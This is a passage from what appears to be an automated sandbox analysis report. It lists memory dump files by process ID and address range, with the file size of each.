                                                                                                                                                                                                              • memory/5716-230-0x0000000000540000-0x00000000009FB000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                              • memory/5744-258-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                184KB

                                                                                                                                                                                                              • memory/5744-261-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                184KB

                                                                                                                                                                                                              • memory/5744-875-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                184KB

                                                                                                                                                                                                              • memory/5744-673-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                184KB

                                                                                                                                                                                                              • memory/5744-726-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                112KB

                                                                                                                                                                                                              • memory/5924-148-0x000000000C8C0000-0x000000000C910000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                320KB

                                                                                                                                                                                                              • memory/5924-89-0x0000000005DC0000-0x0000000005E0C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                304KB

                                                                                                                                                                                                              • memory/5924-73-0x0000000002980000-0x00000000029B6000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                216KB

                                                                                                                                                                                                              • memory/5924-74-0x00000000050B0000-0x00000000056D8000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.2MB

                                                                                                                                                                                                              • memory/5924-75-0x0000000004F70000-0x0000000004F92000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                136KB

                                                                                                                                                                                                              • memory/5924-76-0x0000000005750000-0x00000000057B6000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                408KB

                                                                                                                                                                                                              • memory/5924-77-0x00000000057C0000-0x0000000005826000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                408KB

                                                                                                                                                                                                              • memory/5924-87-0x0000000005830000-0x0000000005B84000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                              • memory/5924-88-0x0000000005D30000-0x0000000005D4E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                120KB

                                                                                                                                                                                                              • memory/5924-90-0x0000000007660000-0x0000000007CDA000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.5MB

                                                                                                                                                                                                              • memory/5924-91-0x0000000006240000-0x000000000625A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                104KB

                                                                                                                                                                                                              • memory/5924-151-0x000000000CEF0000-0x000000000CF3E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                312KB

                                                                                                                                                                                                              • memory/5924-150-0x000000000CC60000-0x000000000CE22000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                              • memory/5924-149-0x000000000C9D0000-0x000000000CA82000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                712KB

                                                                                                                                                                                                              • memory/5924-133-0x000000000C660000-0x000000000C66A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                40KB

                                                                                                                                                                                                              • memory/5924-132-0x0000000004C90000-0x0000000004CAA000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                104KB

                                                                                                                                                                                                              • memory/5924-131-0x000000000C4C0000-0x000000000C614000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                              • memory/5924-99-0x00000000073B0000-0x00000000074A8000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                992KB

                                                                                                                                                                                                              • memory/5924-98-0x0000000002820000-0x0000000002828000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                32KB

                                                                                                                                                                                                              • memory/5924-97-0x0000000007120000-0x00000000071B2000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                584KB

                                                                                                                                                                                                              • memory/5924-94-0x0000000007CE0000-0x0000000008284000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                5.6MB

                                                                                                                                                                                                              • memory/5924-93-0x0000000006EF0000-0x0000000006F12000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                136KB

                                                                                                                                                                                                              • memory/5924-92-0x0000000006FE0000-0x0000000007076000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                600KB

                                                                                                                                                                                                              • memory/6068-152-0x0000000000400000-0x000000000073A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.2MB

                                                                                                                                                                                                              • memory/14532-22232-0x00000000007C0000-0x0000000000C73000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                              • memory/14532-22284-0x00000000007C0000-0x0000000000C73000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                              • memory/17708-1782-0x0000000000540000-0x00000000009FB000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                              • memory/17708-1791-0x0000000000540000-0x00000000009FB000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                              • memory/19116-1729-0x0000000000A20000-0x0000000000E6C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.3MB

                                                                                                                                                                                                              • memory/19116-1741-0x0000000000A20000-0x0000000000E6C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.3MB

                                                                                                                                                                                                              • memory/19116-1742-0x0000000000A20000-0x0000000000E6C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.3MB

                                                                                                                                                                                                              • memory/19116-1803-0x0000000000A20000-0x0000000000E6C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.3MB

                                                                                                                                                                                                              • memory/19116-1806-0x0000000000A20000-0x0000000000E6C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.3MB

                                                                                                                                                                                                              • memory/21436-22788-0x0000000000EC0000-0x000000000136F000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.7MB